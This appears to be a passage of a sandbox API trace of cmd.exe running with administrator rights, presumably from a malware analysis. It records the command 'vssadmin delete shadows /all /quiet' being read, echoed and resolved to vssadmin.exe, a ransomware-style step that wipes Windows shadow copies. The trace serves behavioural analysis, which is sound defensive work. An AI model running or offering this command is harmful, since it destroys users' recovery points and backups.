lpMultiByteStr=0x7ff695349970, cbMultiByte=1, lpWideCharStr=0x7ff695353c50, cchWideChar=1 | out: lpWideCharStr="st=1251\n") returned 1 [0187.391] _get_osfhandle (_FileHandle=0) returned 0x248 [0187.391] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0187.391] ReadFile (in: hFile=0x248, lpBuffer=0x7ff695349970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x23aecffd98, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesRead=0x23aecffd98*=0x1, lpOverlapped=0x0) returned 1 [0187.391] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff695349970, cbMultiByte=1, lpWideCharStr=0x7ff695353c52, cchWideChar=1 | out: lpWideCharStr="h=1251\n") returned 1 [0187.391] _get_osfhandle (_FileHandle=0) returned 0x248 [0187.391] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0187.391] ReadFile (in: hFile=0x248, lpBuffer=0x7ff695349970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x23aecffd98, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesRead=0x23aecffd98*=0x1, lpOverlapped=0x0) returned 1 [0187.391] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff695349970, cbMultiByte=1, lpWideCharStr=0x7ff695353c54, cchWideChar=1 | out: lpWideCharStr="a1251\n") returned 1 [0187.391] _get_osfhandle (_FileHandle=0) returned 0x248 [0187.391] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0187.391] ReadFile (in: hFile=0x248, lpBuffer=0x7ff695349970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x23aecffd98, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesRead=0x23aecffd98*=0x1, lpOverlapped=0x0) returned 1 [0187.391] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff695349970, cbMultiByte=1, lpWideCharStr=0x7ff695353c56, cchWideChar=1 | out: lpWideCharStr="d251\n") returned 1 [0187.391] _get_osfhandle (_FileHandle=0) returned 0x248 [0187.391] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0187.391] ReadFile (in: hFile=0x248, lpBuffer=0x7ff695349970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x23aecffd98, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesRead=0x23aecffd98*=0x1, lpOverlapped=0x0) returned 1 [0187.392] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff695349970, cbMultiByte=1, lpWideCharStr=0x7ff695353c58, cchWideChar=1 | out: lpWideCharStr="o51\n") returned 1 [0187.392] _get_osfhandle (_FileHandle=0) returned 0x248 [0187.392] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0187.392] ReadFile (in: hFile=0x248, lpBuffer=0x7ff695349970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x23aecffd98, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesRead=0x23aecffd98*=0x1, lpOverlapped=0x0) returned 1 [0187.392] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff695349970, cbMultiByte=1, lpWideCharStr=0x7ff695353c5a, cchWideChar=1 | out: lpWideCharStr="w1\n") returned 1 [0187.392] _get_osfhandle (_FileHandle=0) returned 0x248 [0187.392] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0187.392] ReadFile (in: hFile=0x248, lpBuffer=0x7ff695349970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x23aecffd98, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesRead=0x23aecffd98*=0x1, lpOverlapped=0x0) returned 1 [0187.392] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff695349970, cbMultiByte=1, lpWideCharStr=0x7ff695353c5c, cchWideChar=1 | out: lpWideCharStr="s\n") returned 1 [0187.392] _get_osfhandle (_FileHandle=0) returned 0x248 [0187.392] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0187.392] ReadFile (in: hFile=0x248, lpBuffer=0x7ff695349970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x23aecffd98, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesRead=0x23aecffd98*=0x1, lpOverlapped=0x0) returned 1 [0187.392] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff695349970, cbMultiByte=1, lpWideCharStr=0x7ff695353c5e, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0187.392] _get_osfhandle (_FileHandle=0) returned 0x248 [0187.392] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0187.392] ReadFile (in: hFile=0x248, lpBuffer=0x7ff695349970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x23aecffd98, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesRead=0x23aecffd98*=0x1, lpOverlapped=0x0) returned 1 [0187.392] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff695349970, cbMultiByte=1, lpWideCharStr=0x7ff695353c60, cchWideChar=1 | out: lpWideCharStr="/") returned 1 [0187.392] _get_osfhandle (_FileHandle=0) returned 0x248 [0187.392] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0187.392] ReadFile (in: hFile=0x248, lpBuffer=0x7ff695349970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x23aecffd98, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesRead=0x23aecffd98*=0x1, lpOverlapped=0x0) returned 1 [0187.393] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff695349970, cbMultiByte=1, lpWideCharStr=0x7ff695353c62, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0187.393] _get_osfhandle (_FileHandle=0) returned 0x248 [0187.393] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0187.393] ReadFile (in: hFile=0x248, lpBuffer=0x7ff695349970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x23aecffd98, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesRead=0x23aecffd98*=0x1, lpOverlapped=0x0) returned 1 [0187.393] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff695349970, cbMultiByte=1, lpWideCharStr=0x7ff695353c64, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0187.393] _get_osfhandle (_FileHandle=0) returned 0x248 [0187.393] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0187.393] ReadFile (in: hFile=0x248, lpBuffer=0x7ff695349970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x23aecffd98, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesRead=0x23aecffd98*=0x1, lpOverlapped=0x0) returned 1 [0187.393] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff695349970, cbMultiByte=1, lpWideCharStr=0x7ff695353c66, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0187.393] _get_osfhandle (_FileHandle=0) returned 0x248 [0187.393] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0187.393] ReadFile (in: hFile=0x248, lpBuffer=0x7ff695349970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x23aecffd98, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesRead=0x23aecffd98*=0x1, lpOverlapped=0x0) returned 1 [0187.393] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff695349970, cbMultiByte=1, lpWideCharStr=0x7ff695353c68, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0187.393] _get_osfhandle (_FileHandle=0) returned 0x248 [0187.393] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0187.393] ReadFile (in: hFile=0x248, lpBuffer=0x7ff695349970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x23aecffd98, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesRead=0x23aecffd98*=0x1, lpOverlapped=0x0) returned 1 [0187.393] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff695349970, cbMultiByte=1, lpWideCharStr=0x7ff695353c6a, cchWideChar=1 | out: lpWideCharStr="/") returned 1 [0187.393] _get_osfhandle (_FileHandle=0) returned 0x248 [0187.393] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0187.393] ReadFile (in: hFile=0x248, lpBuffer=0x7ff695349970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x23aecffd98, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesRead=0x23aecffd98*=0x1, lpOverlapped=0x0) returned 1 [0187.393] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff695349970, cbMultiByte=1, lpWideCharStr=0x7ff695353c6c, cchWideChar=1 | out: lpWideCharStr="q") returned 1 [0187.394] _get_osfhandle (_FileHandle=0) returned 0x248 [0187.394] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0187.394] ReadFile (in: hFile=0x248, lpBuffer=0x7ff695349970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x23aecffd98, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesRead=0x23aecffd98*=0x1, lpOverlapped=0x0) returned 1 [0187.394] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff695349970, cbMultiByte=1, lpWideCharStr=0x7ff695353c6e, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0187.394] _get_osfhandle (_FileHandle=0) returned 0x248 [0187.394] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0187.394] ReadFile (in: hFile=0x248, lpBuffer=0x7ff695349970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x23aecffd98, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesRead=0x23aecffd98*=0x1, lpOverlapped=0x0) returned 1 [0187.394] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff695349970, cbMultiByte=1, lpWideCharStr=0x7ff695353c70, cchWideChar=1 | out: lpWideCharStr="i") returned 1 [0187.394] _get_osfhandle (_FileHandle=0) returned 0x248 [0187.394] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0187.394] ReadFile (in: hFile=0x248, lpBuffer=0x7ff695349970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x23aecffd98, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesRead=0x23aecffd98*=0x1, lpOverlapped=0x0) returned 1 [0187.394] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff695349970, cbMultiByte=1, lpWideCharStr=0x7ff695353c72, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0187.394] _get_osfhandle (_FileHandle=0) returned 0x248 [0187.394] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0187.394] ReadFile (in: hFile=0x248, lpBuffer=0x7ff695349970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x23aecffd98, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesRead=0x23aecffd98*=0x1, lpOverlapped=0x0) returned 1 [0187.394] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff695349970, cbMultiByte=1, lpWideCharStr=0x7ff695353c74, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0187.394] _get_osfhandle (_FileHandle=0) returned 0x248 [0187.394] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0187.394] ReadFile (in: hFile=0x248, lpBuffer=0x7ff695349970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x23aecffd98, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesRead=0x23aecffd98*=0x1, lpOverlapped=0x0) returned 1 [0187.394] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff695349970, cbMultiByte=1, lpWideCharStr=0x7ff695353c76, cchWideChar=1 | out: lpWideCharStr="\n") returned 1 [0187.395] _get_osfhandle (_FileHandle=0) returned 0x248 [0187.395] GetFileType (hFile=0x248) returned 0x3 [0187.395] _get_osfhandle (_FileHandle=0) returned 0x248 [0187.395] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0187.395] _get_osfhandle (_FileHandle=1) returned 0x254 [0187.395] GetFileType (hFile=0x254) returned 0x3 [0187.395] _get_osfhandle (_FileHandle=1) returned 0x254 [0187.395] WideCharToMultiByte (in: CodePage=0x4e3, dwFlags=0x0, lpWideCharStr="vssadmin delete shadows /all /quiet\n", cchWideChar=-1, lpMultiByteStr=0x7ff695349970, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vssadmin delete shadows /all /quiet\n", lpUsedDefaultChar=0x0) returned 37 [0187.395] WriteFile (in: hFile=0x254, lpBuffer=0x7ff695349970*, nNumberOfBytesToWrite=0x24, lpNumberOfBytesWritten=0x23aecffd38, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesWritten=0x23aecffd38*=0x24, lpOverlapped=0x0) returned 1 [0187.395] GetProcessHeap () returned 0x1ce53620000 [0187.395] RtlAllocateHeap (HeapHandle=0x1ce53620000, Flags=0x8, Size=0x4012) returned 0x1ce53628bb0 [0187.395] GetProcessHeap () returned 0x1ce53620000 [0187.395] RtlFreeHeap (HeapHandle=0x1ce53620000, Flags=0x0, BaseAddress=0x1ce53628bb0) returned 1 [0187.396] _wcsicmp (_String1="vssadmin", _String2=")") returned 77 [0187.396] _wcsicmp (_String1="FOR", _String2="vssadmin") returned -16 [0187.396] _wcsicmp (_String1="FOR/?", _String2="vssadmin") returned -16 [0187.396] _wcsicmp (_String1="IF", _String2="vssadmin") returned -13 [0187.396] _wcsicmp (_String1="IF/?", _String2="vssadmin") returned -13 [0187.396] _wcsicmp (_String1="REM", _String2="vssadmin") returned -4 [0187.396] _wcsicmp (_String1="REM/?", _String2="vssadmin") returned -4 [0187.396] GetProcessHeap () returned 0x1ce53620000 [0187.396] RtlAllocateHeap (HeapHandle=0x1ce53620000, Flags=0x8, Size=0xb0) returned 0x1ce53626e30 [0187.396] GetProcessHeap () returned 0x1ce53620000 [0187.396] RtlAllocateHeap (HeapHandle=0x1ce53620000, Flags=0x8, Size=0x22) returned 0x1ce53626c60 [0187.397] GetProcessHeap () returned 0x1ce53620000 [0187.397] RtlAllocateHeap (HeapHandle=0x1ce53620000, Flags=0x8, Size=0x48) returned 0x1ce536391b0 [0187.398] GetConsoleOutputCP () returned 0x4e3 [0187.400] GetCPInfo (in: CodePage=0x4e3, lpCPInfo=0x7ff69534fbb0 | out: lpCPInfo=0x7ff69534fbb0) returned 1 [0187.400] SetThreadUILanguage (LangId=0x0) returned 0x409 [0187.401] GetConsoleTitleW (in: lpConsoleTitle=0x23aecffb80, nSize=0x104 | out: lpConsoleTitle="Administrator: C:\\WINDOWS\\system32\\cmd.exe") returned 0x2b [0187.402] malloc (_Size=0xffce) returned 0x1ce53810840 [0187.402] ??_V@YAXPEAX@Z () returned 0x1ce53810840 [0187.402] malloc (_Size=0xffce) returned 0x1ce53820820 [0187.402] ??_V@YAXPEAX@Z () returned 0x1ce53820820 [0187.402] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18 [0187.402] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17 [0187.402] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18 [0187.402] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2 [0187.402] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19 [0187.402] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19 [0187.402] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19 [0187.402] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4 [0187.402] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4 [0187.402] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17 [0187.402] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3 [0187.402] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6 [0187.402] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18 [0187.402] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2 [0187.402] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6 [0187.402] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9 [0187.402] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9 [0187.402] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4 [0187.402] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4 [0187.402] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6 [0187.402] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15 [0187.402] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3 [0187.402] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19 [0187.402] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19 [0187.402] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14 [0187.402] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14 [0187.403] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4 [0187.403] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17 [0187.403] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3 [0187.403] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17 [0187.403] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2 [0187.403] _wcsicmp (_String1="vssadmin", _String2="START") returned 3 [0187.403] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18 [0187.403] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11 [0187.403] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9 [0187.403] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6 [0187.403] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6 [0187.403] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21 [0187.403] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16 [0187.403] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20 [0187.403] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19 [0187.403] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9 [0187.403] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18 [0187.403] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17 [0187.403] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18 [0187.403] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2 [0187.403] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19 [0187.403] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19 [0187.403] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19 [0187.403] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4 [0187.403] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4 [0187.403] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17 [0187.403] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3 [0187.403] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6 [0187.403] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18 [0187.403] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2 [0187.403] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6 [0187.403] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9 [0187.403] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9 [0187.403] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4 [0187.403] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4 [0187.403] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6 [0187.403] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15 [0187.403] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3 [0187.404] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19 [0187.404] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19 [0187.404] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14 [0187.404] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14 [0187.404] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4 [0187.404] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17 [0187.404] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3 [0187.404] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17 [0187.404] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2 [0187.404] _wcsicmp (_String1="vssadmin", _String2="START") returned 3 [0187.404] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18 [0187.404] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11 [0187.404] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9 [0187.404] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6 [0187.404] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6 [0187.404] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21 [0187.404] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16 [0187.404] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20 [0187.404] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19 [0187.404] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9 [0187.404] _wcsicmp (_String1="vssadmin", _String2="FOR") returned 16 [0187.404] _wcsicmp (_String1="vssadmin", _String2="IF") returned 13 [0187.404] _wcsicmp (_String1="vssadmin", _String2="REM") returned 4 [0187.404] ??_V@YAXPEAX@Z () returned 0x1 [0187.404] GetProcessHeap () returned 0x1ce53620000 [0187.404] RtlAllocateHeap (HeapHandle=0x1ce53620000, Flags=0x8, Size=0xffde) returned 0x1ce53628bb0 [0187.406] GetProcessHeap () returned 0x1ce53620000 [0187.406] RtlAllocateHeap (HeapHandle=0x1ce53620000, Flags=0x8, Size=0x5a) returned 0x1ce53639200 [0187.406] _wcsnicmp (_String1="vssa", _String2="cmd ", _MaxCount=0x4) returned 19 [0187.406] malloc (_Size=0xffce) returned 0x1ce53820820 [0187.406] ??_V@YAXPEAX@Z () returned 0x1ce53820820 [0187.406] GetProcessHeap () returned 0x1ce53620000 [0187.406] RtlAllocateHeap (HeapHandle=0x1ce53620000, Flags=0x8, Size=0x1ffac) returned 0x1ce5363c060 [0187.408] SetErrorMode (uMode=0x0) returned 0x0 [0187.408] SetErrorMode (uMode=0x1) returned 0x0 [0187.408] GetFullPathNameW (in: lpFileName=".", nBufferLength=0xffce, lpBuffer=0x1ce5363c070, lpFilePart=0x23aecff400 | out: lpBuffer="C:\\WINDOWS\\system32", lpFilePart=0x23aecff400*="system32") returned 0x13 [0187.408] SetErrorMode (uMode=0x0) returned 0x1 [0187.408] GetProcessHeap () returned 0x1ce53620000 [0187.408] RtlReAllocateHeap (Heap=0x1ce53620000, Flags=0x0, Ptr=0x1ce5363c060, Size=0x4a) returned 0x1ce5363c060 [0187.408] GetProcessHeap () returned 0x1ce53620000 [0187.408] RtlSizeHeap (HeapHandle=0x1ce53620000, Flags=0x0, MemoryPointer=0x1ce5363c060) returned 0x4a [0187.408] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff69534bb90, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0187.408] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0187.408] GetProcessHeap () returned 0x1ce53620000 [0187.408] RtlAllocateHeap (HeapHandle=0x1ce53620000, Flags=0x8, Size=0x1b4) returned 0x1ce53639ac0 [0187.408] GetProcessHeap () returned 0x1ce53620000 [0187.408] RtlAllocateHeap (HeapHandle=0x1ce53620000, Flags=0x8, Size=0x358) returned 0x1ce53638ba0 [0187.408] GetProcessHeap () returned 0x1ce53620000 [0187.408] RtlReAllocateHeap (Heap=0x1ce53620000, Flags=0x0, Ptr=0x1ce53638ba0, Size=0x1b6) returned 0x1ce53638ba0 [0187.408] GetProcessHeap () returned 0x1ce53620000 [0187.408] RtlSizeHeap (HeapHandle=0x1ce53620000, Flags=0x0, MemoryPointer=0x1ce53638ba0) returned 0x1b6 [0187.408] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff69534bb90, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0187.408] GetProcessHeap () returned 0x1ce53620000 [0187.408] RtlAllocateHeap (HeapHandle=0x1ce53620000, Flags=0x8, Size=0xe8) returned 0x1ce53639c80 [0187.408] GetProcessHeap () returned 0x1ce53620000 [0187.408] RtlReAllocateHeap (Heap=0x1ce53620000, Flags=0x0, Ptr=0x1ce53639c80, Size=0x7e) returned 0x1ce53639c80 [0187.408] GetProcessHeap () returned 0x1ce53620000 [0187.409] RtlSizeHeap (HeapHandle=0x1ce53620000, Flags=0x0, MemoryPointer=0x1ce53639c80) returned 0x7e [0187.409] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0187.409] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\vssadmin.*", fInfoLevelId=0x1, lpFindFileData=0x23aecff170, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x23aecff170) returned 0x1ce53639270 [0187.409] FindClose (in: hFindFile=0x1ce53639270 | out: hFindFile=0x1ce53639270) returned 1 [0187.409] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\vssadmin.COM", fInfoLevelId=0x1, lpFindFileData=0x23aecff170, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x23aecff170) returned 0xffffffffffffffff [0187.409] GetLastError () returned 0x2 [0187.409] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\vssadmin.EXE", fInfoLevelId=0x1, lpFindFileData=0x23aecff170, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x23aecff170) returned 0x1ce53639270 [0187.410] FindClose (in: 